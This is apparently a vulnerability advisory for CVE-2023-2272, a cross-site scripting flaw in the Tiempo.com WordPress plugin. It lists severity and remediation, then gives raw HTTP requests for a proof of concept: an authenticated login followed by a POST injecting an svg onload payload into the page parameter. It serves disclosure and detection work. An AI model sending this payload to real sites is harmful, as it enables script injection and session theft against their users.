| Title | Tiempo.com <= 0.1.2 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Upgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.18279 |
| CVE ID | CVE-2023-2272 |
| CWE ID | CWE-79 |
| Tags | cve cve2023 wpscan wp wp-plugin wordpress authenticated xss tiempocom tiempo vuln |
Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=hk3qqi&pwd=rUvgMm&wp-submit=Log+In
POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2272.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-2272.pcap
N/AN/A